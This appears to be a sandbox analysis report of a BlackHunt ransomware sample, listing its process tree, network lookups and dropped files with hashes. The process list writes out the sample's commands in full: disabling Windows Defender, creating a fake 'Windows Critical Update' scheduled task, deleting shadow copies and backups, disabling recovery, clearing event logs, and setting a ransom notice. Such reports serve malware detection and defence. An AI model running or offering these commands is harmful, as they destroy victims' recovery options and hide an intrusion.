Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 7668 -ip 7668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 1464

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\ProgramData\#BlackHunt_Private.key

MD5 73446c35218e6ae0c89544784ed6ac3c
SHA1 f394cd41f1dff525d25bfbfb2d1d904a2112da54
SHA256 87c9c27392b63318cbf789bae1474ab9887f0bdaeda89184213a609387759a58
SHA512 fb66882775d7f97a8f1df621922af4c405830ecab21dcf676024b42b6cbd450d53c51a00953eb9d5c4410e476b6c7f0c0cf91ee1db1ec2060f2e1fcc7625a67a

C:\ProgramData\#BlackHunt_ReadMe.hta

MD5 e309e86aa475bf9ab6d9ec368d40fe5a
SHA1 3db62b6572867604cd091a6c518c4458308d002e
SHA256 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2
SHA512 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583

C:\ProgramData\#BlackHunt_ReadMe.txt

MD5 88d5b995bf93732281a24ffa8c40ab5c
SHA1 ed0d8cb268e450141673338e131ff2bd97f8b23c
SHA256 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1
SHA512 ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e